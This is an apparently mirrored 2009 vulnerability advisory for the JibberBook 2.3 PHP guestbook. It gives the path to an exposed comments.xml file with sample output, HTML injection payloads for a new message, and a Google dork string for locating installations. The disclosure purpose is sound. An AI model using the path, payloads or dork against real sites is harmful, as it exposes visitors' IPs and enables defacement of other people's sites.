JibberBook GuestBook 2.3 Multiple Vulnerabilities

2009-08-1200:00:00

vulners.com

###########################################################################
###########################################################################

    [»] Script:             [ JibberBook  ]
    [»] Language:           [ PHP ]
    [»] Website:            [ http://jibberbook.com ]
    [»] Founder:            [ Onur YILMAZ aka DJR ]
    [»] Site:               [ www.onuryilmaz.info ]

###########################################################################
###########################################################################

=== [ data source of comments disclosure (.xml file) ] ===

    [»] [JibberBook]/data_layer/xml/comments.xml

    === [ output ] ===

            &lt;message mID=&quot;m54a7c965f0318a7.23679427&quot;&gt;
             &lt;name&gt;&lt;/name&gt; 
             &lt;website /&gt; 
             &lt;comment&gt;&lt;/comment&gt; 
             &lt;date&gt;&lt;/date&gt; 
             &lt;user_ip&gt;127.0.0.1&lt;/user_ip&gt; 
             &lt;user_agent&gt;Mozilla/5.0 &#40;Windows; U; Windows NT 6.0; en-US&#41; AppleWebKit/530.5 &#40;KHTML,

like Gecko) Chrome/2.0.172.39 Safari/530.5</user_agent>
<spam>0</spam>
</message>

###########################################################################
###########################################################################

=== [ HTML Code Injection ] ===

    [»] add new message
    
            &lt;img src=&quot;&quot;&gt;

            &lt;a href=&quot;&quot;&gt;&lt;/a&gt;

###########################################################################
###########################################################################

=== [ Google Dork ] ===

    [»] &quot;JibberBook created by&quot;

###########################################################################
###########################################################################

JSON